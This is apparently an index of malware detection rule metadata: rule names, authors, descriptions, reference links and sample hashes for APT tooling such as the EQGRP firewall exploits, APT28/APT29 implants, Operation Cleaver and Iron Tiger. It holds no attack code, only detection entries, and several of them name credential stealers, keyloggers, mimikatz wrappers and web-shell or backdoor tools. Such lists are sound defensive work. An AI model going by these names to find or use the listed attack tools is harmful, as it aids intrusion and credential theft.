malware_index EQGRP_BananaAid description: EQGRP Toolset Firewall - file BananaAid author: Florian Roth reference: Research date: 2016-08-16 hash1: 7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f
malware_index EQGRP_shellcode description: EQGRP Toolset Firewall - file shellcode.py author: Florian Roth reference: Research date: 2016-08-16 hash1: ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f
malware_index EQGRP_jetplow_SH description: EQGRP Toolset Firewall - file jetplow.sh author: Florian Roth reference: Research date: 2016-08-16 hash1: ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c
malware_index EQGRP_extrabacon description: EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py author: Florian Roth reference: Research date: 2016-08-16 hash1: 59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735
malware_index EQGRP_sploit_py description: EQGRP Toolset Firewall - file sploit.py author: Florian Roth reference: Research date: 2016-08-16 hash1: 0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6
malware_index EQGRP_StoreFc description: EQGRP Toolset Firewall - file StoreFc.py author: Florian Roth reference: Research date: 2016-08-16 hash1: f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108
malware_index EQGRP_callbacks description: EQGRP Toolset Firewall - Callback addresses author: Florian Roth reference: Research date: 2016-08-16
malware_index EQGRP_Unique_Strings description: EQGRP Toolset Firewall - Unique strings author: Florian Roth reference: Research date: 2016-08-16
malware_index EQGRP_RC5_RC6_Opcode description: EQGRP Toolset Firewall - RC5 / RC6 opcode author: Florian Roth reference: https://securelist.com/blog/incidents/75812/the-equation-giveaway/ date: 2016-08-17
malware_index apt_equation_exploitlib_mutexes copyright: Kaspersky Lab description: Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW version: 1.0 last_modified: 2015-02-16 reference: http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/
malware_index apt_equation_equationlaser_runtimeclasses copyright: Kaspersky Lab description: Rule to detect the EquationLaser malware version: 1.0 last_modified: 2015-02-16 reference: https://securelist.com/blog/
malware_index apt_equation_cryptotable copyright: Kaspersky Lab description: Rule to detect the crypto library used in Equation group malware version: 1.0 last_modified: 2015-02-16 reference: https://securelist.com/blog/
malware_index apt_equation_keyword description: Rule to detect Equation group's keyword in executable file author: Florian Roth @4nc4p last_modified: 2015-09-26 reference: http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/
malware_index FVEY_ShadowBrokers_Jan17_Screen_Strings description: Detects strings derived from the ShadowBroker's leak of Windows tools/exploits author: Florian Roth reference: https://bit.no.com:43110/theshadowbrokers.bit/post/message7/ date: 2017-01-08
malware_index FiveEyes_QUERTY_Malwaresig_20123_cmdDef description: FiveEyes QUERTY Malware - file 20123_cmdDef.xml author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: 7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd
malware_index FiveEyes_QUERTY_Malwareqwerty_20123 description: FiveEyes QUERTY Malware - file 20123.xml author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: edc7228b2e27df9e7ff9286bddbf4e46adb51ed9
malware_index FiveEyes_QUERTY_Malwaresig_20120_dll description: FiveEyes QUERTY Malware - file 20120.dll.bin author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: 6811bfa3b8cda5147440918f83c40237183dbd25
malware_index FiveEyes_QUERTY_Malwaresig_20120_cmdDef description: FiveEyes QUERTY Malware - file 20120_cmdDef.xml author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: cda9ceaf0a39d6b8211ce96307302a53dfbd71ea
malware_index FiveEyes_QUERTY_Malwaresig_20121_cmdDef description: FiveEyes QUERTY Malware - file 20121_cmdDef.xml author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: 64ac06aa4e8d93ea6063eade7ce9687b1d035907
malware_index Greenbug_Malware_4 description: Detects ISMDoor Backdoor author: Florian Roth reference: https://goo.gl/urp4CD date: 2017-01-25 super_rule: 1 hash1: 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f hash2: 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9
malware_index IMPLANT_1_v3 description: Downrage Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_1_v7 description: Downrage Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_2_v3 description: CORESHELL/SOURFACE Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_2_v15 description: CORESHELL/SOURFACE Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_2_v17 description: CORESHELL/SOURFACE Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_3_v1 description: X-Agent/CHOPSTICK Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_3_v3 description: X-Agent/CHOPSTICK Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v2 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v3_AlternativeRule description: BlackEnergy / Voodoo Bear Implant by APT28 comment: Alternative rule - not based on the original samples but samples on which the original rule matched author: Florian Roth reference: US CERT Grizzly Steppe Report date: 2017-02-12 hash1: 2244fe9c5d038edcb5406b45361613cf3909c491e47debef35329060b00c985a
malware_index IMPLANT_4_v4 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v5 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v9 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v10 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v11 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_5_v2 description: XTunnel Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_5_v3 description: XTunnel Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_5_v4 description: XTunnel Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_6_v1 description: Sednit / EVILTOSS Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_6_v2 description: Sednit / EVILTOSS Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_7_v1 description: Implant 7 by APT29 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_8_v1 description: HAMMERTOSS / HammerDuke Implant by APT29 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_10_v2 description: CozyDuke / CozyCar / CozyBear Implant by APT29 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index Unidentified_Malware_Two description: Unidentified Implant by APT29 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index apt_hellsing_implantstrings Author: Costin Raiu, Kaspersky Lab Date: 2015-04-07 Description: detection for Hellsing implants Reference: http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back
malware_index APT_Hikit_msrv author: ThreatConnect Intelligence Research Team
malware_index IronTiger_ASPXSpy author: Cyber Safety Solutions, Trend Micro description: ASPXSpy detection. It might be used by other fraudsters reference: http://goo.gl/T5fSJC
malware_index IronTiger_ChangePort_Toolkit_driversinstall author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - Changeport Toolkit driverinstall reference: http://goo.gl/T5fSJC
malware_index IronTiger_ChangePort_Toolkit_ChangePortExe author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - Toolkit ChangePort reference: http://goo.gl/T5fSJC
malware_index IronTiger_dllshellexc2010 author: Cyber Safety Solutions, Trend Micro description: dllshellexc2010 Exchange backdoor + remote shell reference: http://goo.gl/T5fSJC
malware_index IronTiger_dnstunnel author: Cyber Safety Solutions, Trend Micro description: This rule detects a dns tunnel tool used in Operation Iron Tiger reference: http://goo.gl/T5fSJC
malware_index IronTiger_EFH3_encoder author: Cyber Safety Solutions, Trend Micro description: Iron Tiger EFH3 Encoder reference: http://goo.gl/T5fSJC
malware_index IronTiger_GetPassword_x64 author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - GetPassword x64 reference: http://goo.gl/T5fSJC
malware_index IronTiger_GetUserInfo author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - GetUserInfo reference: http://goo.gl/T5fSJC
malware_index IronTiger_Gh0stRAT_variant author: Cyber Safety Solutions, Trend Micro description: This is a detection for a s.exe variant seen in Op. Iron Tiger reference: http://goo.gl/T5fSJC
malware_index IronTiger_GTalk_Trojan author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - GTalk Trojan reference: http://goo.gl/T5fSJC
malware_index IronTiger_HTTPBrowser_Dropper author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - HTTPBrowser Dropper reference: http://goo.gl/T5fSJC
malware_index IronTiger_HTTP_SOCKS_Proxy_soexe author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Toolset - HTTP SOCKS Proxy soexe reference: http://goo.gl/T5fSJC
malware_index IronTiger_NBDDos_Gh0stvariant_dropper author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - NBDDos Gh0stvariant Dropper reference: http://goo.gl/T5fSJC
malware_index IronTiger_PlugX_DosEmulator author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - PlugX DosEmulator reference: http://goo.gl/T5fSJC
malware_index IronTiger_PlugX_FastProxy author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - PlugX FastProxy reference: http://goo.gl/T5fSJC
malware_index IronTiger_PlugX_Server author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - PlugX Server reference: http://goo.gl/T5fSJC
malware_index IronTiger_ReadPWD86 author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - ReadPWD86 reference: http://goo.gl/T5fSJC
malware_index IronTiger_Ring_Gh0stvariant author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - Ring Gh0stvariant reference: http://goo.gl/T5fSJC
malware_index IronTiger_wmiexec author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Tool - wmi.vbs detection reference: http://goo.gl/T5fSJC
malware_index IronPanda_Malware_Htran description: Iron Panda Malware Htran author: Florian Roth reference: https://goo.gl/E4qia9 date: 2015-09-16 hash: 7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7
malware_index KeyBoy_Dropper Author: Rapid7 Labs Date: 2013/06/07 Description: Strings inside Reference: https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india
malware_index KeyBoy_Backdoor Author: Rapid7 Labs Date: 2013/06/07 Description: Strings inside Reference: https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india
malware_index EliseLotusBlossom author: Jose Ramon Palanco date: 2015-06-23 description: Elise Backdoor Trojan ref: https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html
malware_index MirageStrings description: Mirage Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index Mirage description: Mirage author: Seth Hardy last_modified: 2014-06-25
malware_index Mirage_APT Author: Silas Cutler Date: yyyy/mm/dd Description: Malware related to APT campaign Reference: Useful link
malware_index Molerats_certs Author: FireEye Labs Date: 2013/08/23 Description: this rule detects code signed with certificates used by the Molerats actor Reference: https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html
malware_index MongalCode description: Mongal code features author: Seth Hardy last_modified: 2014-07-15
malware_index MongalStrings description: Mongal Identifying Strings author: Seth Hardy last_modified: 2014-07-15
malware_index Mongal description: Mongal author: Seth Hardy last_modified: 2014-07-15
malware_index APT_NGO_wuaclt author: AlienVault Labs
malware_index ZhoupinExploitCrew author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index BackDoorLogger author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index Jasus author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index NetC author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index ShellCreator2 author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index SmartCopy2 author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index SynFlooder author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index TinyZBot author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index antivirusdetector author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index csext author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index kagent author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index mimikatzWrapper author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index pvz_in author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index pvz_out author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index wndTest author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index zhCat author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index zhLookUp author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index zhmimikatz author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index Zh0uSh311 author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index OPCLEAVER_BackDoorLogger description: Keylogger used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_Jasus description: ARP cache poisoner used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_NetC description: Net Crawler used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_ShellCreator2 description: Shell Creator used by attackers in Operation Cleaver to create ASPX web shells reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_SmartCopy2 description: Malware or hack tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_SynFlooder description: Malware or hack tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_TinyZBot description: Tiny Bot used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_ZhoupinExploitCrew description: Keywords used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_antivirusdetector description: Hack tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_csext description: Backdoor used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_kagent description: Backdoor used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_mimikatzWrapper description: Mimikatz Wrapper used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_pvz_in description: Parviz tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_pvz_out description: Parviz tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_wndTest description: Backdoor used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_zhLookUp description: Hack tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_zhmimikatz description: Mimikatz wrapper used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OpClandestineWolf alert_severity: HIGH log: false author: NDF weight: 10 alert: True source: https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html version: 1 date: 2015-06-23 description: Operation Clandestine Wolf signature based on OSINT from 06.23.15
malware_index Misdat_Backdoor author: Cylance SPEAR Team
malware_index SType_Backdoor author: Cylance SPEAR Team
malware_index Zlib_Backdoor author: Cylance SPEAR Team
malware_index Potao Author: Anton Cherepanov Date: 2015/07/29 Description: Operation Potao Reference: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf Source: https://github.com/eset/malware-ioc/ Contact: threatintel@eset.com License: BSD 2-Clause
malware_index backdoor_apt_pcclient author: @patrickrolsen maltype: APT.PCCLient filetype: DLL version: 0.1 description: Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF) date: 2012-10
malware_index PassCV_Sabre_Malware_Signing_Cert description: PassCV Malware mentioned in Cylance Report author: Florian Roth reference: https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies date: 2016-10-20 score: 50 hash1: 7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e
malware_index PassCV_Sabre_Malware_Excalibur_1 description: PassCV Malware mentioned in Cylance Report author: Florian Roth reference: https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies date: 2016-10-20 hash1: 21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb hash2: 02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70
malware_index PassCV_Sabre_Malware_5 description: PassCV Malware mentioned in Cylance Report author: Florian Roth reference: https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies date: 2016-10-20 hash1: 03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5
malware_index APT_Win_Pipcreat author: chort (@chort0) description: APT backdoor Pipcreat filetype: pe,dll date: 2013-03 MD5: f09d832bea93cf320986b53fce4b8397 Reference: http://www.cyberengineeringservices.com/login-exe-analysis-trojan-pipcreat/ version: 1.0
malware_index Trojan_Win32_PlaSrv author: Microsoft description: Hotpatching Injector original_sample_sha1: ff7f949da665ba8ce9fb01da357b51415634eaad unpacked_sample_sha1: dff2fee984ba9f5a8f5d97582c83fca4fa1fe131 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Platual author: Microsoft description: Installer component original_sample_sha1: e0ac2ae221328313a7eee33e9be0924c46e2beb9 unpacked_sample_sha1: ccaf36c2d02c3c5ca24eeeb7b1eae7742a23a86a activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plaplex author: Microsoft description: Variant of the JPin backdoor original_sample_sha1: ca3bda30a3cdc15afb78e54fa1bbb9300d268d66 unpacked_sample_sha1: 2fe3c80e98bbb0cf5a0c4da286cd48ec78130a24 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Dipsind_B author: Microsoft description: Dipsind Family sample_sha1: 09e0dfbb5543c708c0dd6a89fd22bbb96dc4ca1c activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_PlaKeylog_B author: Microsoft description: Keylogger component original_sample_sha1: 0096a3e0c97b85ca75164f48230ae530c94a2b77 unpacked_sample_sha1: 6a1412daaa9bdc553689537df0a004d44f8a45fd activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Adupib author: Microsoft description: Adupib SSL Backdoor original_sample_sha1: d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd unpacked_sample_sha1: a80051d5ae124fd9e5cc03e699dd91c2b373978b activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_PlaLsaLog author: Microsoft description: Loader / possible incomplete LSA Password Filter original_sample_sha1: fa087986697e4117c394c9a58cb9f316b2d9f7d8 unpacked_sample_sha1: 29cb81dbe491143b2f8b67beaeae6557d8944ab4 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plakelog author: Microsoft description: Raw-input based keylogger original_sample_sha1: 3907a9e41df805f912f821a47031164b6636bd04 unpacked_sample_sha1: 960feeb15a0939ec0b53dcb6815adbf7ac1e7bb2 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plainst author: Microsoft description: Installer component original_sample_sha1: 99c08d31af211a0e17f92dd312ec7ca2b9469ecb unpacked_sample_sha1: dcb6cf7cf7c8fdfc89656a042f81136bda354ba6 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plagicom author: Microsoft description: Installer component original_sample_sha1: 99dcb148b053f4cef6df5fa1ec5d33971a58bd1e unpacked_sample_sha1: c1c950bc6a2ad67488e675da4dfc8916831239a7 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plaklog author: Microsoft description: Hook-based keylogger original_sample_sha1: 831a5a29d47ab85ee3216d4e75f18d93641a9819 unpacked_sample_sha1: e18750207ddbd939975466a0e01bd84e75327dda activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plapiio author: Microsoft description: JPin backdoor original_sample_sha1: 3119de80088c52bd8097394092847cd984606c88 unpacked_sample_sha1: 3acb8fe2a5eb3478b4553907a571b6614eb5455c activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plabit author: Microsoft description: Installer component sample_sha1: 6d1169775a552230302131f9385135d385efd166 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Placisc2 author: Microsoft description: Dipsind variant original_sample_sha1: bf944eb70a382bd77ee5b47548ea9a4969de0527 unpacked_sample_sha1: d807648ddecc4572c7b04405f496d25700e0be6e activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Placisc3 author: Microsoft description: Dipsind variant original_sample_sha1: 1b542dd0dacfcd4200879221709f5fa9683cdcda unpacked_sample_sha1: bbd4992ee3f3a3267732151636359cf94fb4575d activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Placisc4 author: Microsoft description: Installer for Dipsind variant original_sample_sha1: 3d17828632e8ff1560f6094703ece5433bc69586 unpacked_sample_sha1: 2abb8e1e9cac24be474e4955c63108ff86d1a034 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index PrikormkaDropper
malware_index PrikormkaModule
malware_index Prikormka Author: Anton Cherepanov Date: 2016/05/10 Description: Operation Groundbait Source: https://github.com/eset/malware-ioc/ Contact: threatintel@eset.com License: BSD 2-Clause
malware_index apt_regin_legspin copyright: Kaspersky Lab description: Rule to detect Regin's Legspin module version: 1.0 last_modified: 2015-01-22 reference: https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/ md5: 29105f46e4d33f66fee346cfd099d1cc
malware_index apt_regin_rc5key copyright: Kaspersky Lab description: Rule to detect Regin RC5 decryption keys version: 1.0 last_modified: 2014-11-18
malware_index apt_regin_dispatcher_disp_dll copyright: Kaspersky Lab author: Kaspersky Lab description: Rule to detect Regin disp.dll dispatcher version: 1.0 last_modified: 2014-11-18
malware_index Scieron author: Symantec Security Response ref: http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012 date: 22.01.15
malware_index apt_sofacy_xtunnel author: Claudio Guarnieri description: Sofacy Malware - German Bundestag score: 75
malware_index StuxNet_Malware_1 description: Stuxnet Sample - file malware.exe author: Florian Roth reference: Internal Research date: 2016-07-09 hash1: 9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8
malware_index liudoor author: RSA FirstWatch date: 2015-07-23 description: Detects Liudoor daemon backdoor hash0: 78b56bc3edbee3a425c96738760ee406 hash1: 5aa0510f6f1b0e48f0303b9a4bfc641e hash2: 531d30c8ee27d62e6fbe855299d0e7de hash3: 2be2ac65fd97ccc97027184f0310f2f3 hash4: 6093505c7f7ec25b1934d3657649ef07 type: Win32 DLL
malware_index ThreatGroup3390_C2 description: Threat Group 3390 APT - C2 Server author: Florian Roth reference: http://snip.ly/giNB date: 2015-08-06 score: 60
malware_index Turla_APT_Malware_Gen2 description: Detects Turla malware (based on sample used in the RUAG APT case) author: Florian Roth family: Turla reference: https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case date: 2016-06-09 hash1: 0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4 hash2: 7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9 hash3: fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd hash4: c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4
malware_index turla_dropper maltype: turla dropper ref: https://github.com/reed1713 reference: http://info.baesystemsdetica.com/rs/baesystems/images/snake_whitepaper.pdf date: 3/13/2014 description: This sample was pulled from the bae systems snake campaign report. The Turla dropper creates a file in the temp dir and registers an auto start service called "RPC Endpoint Locator".
malware_index dubseven_dropper_dialog_remains author: Matt Brooks, @cmatthewbrooks desc: Searches for related dialog remnants. How rude.
malware_index maindll_mutex author: Matt Brooks, @cmatthewbrooks desc: Matches on the maindll mutex ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index SLServer_dialog_remains author: Matt Brooks, @cmatthewbrooks desc: Searches for related dialog remnants. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index SLServer_mutex author: Matt Brooks, @cmatthewbrooks desc: Searches for the mutex. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
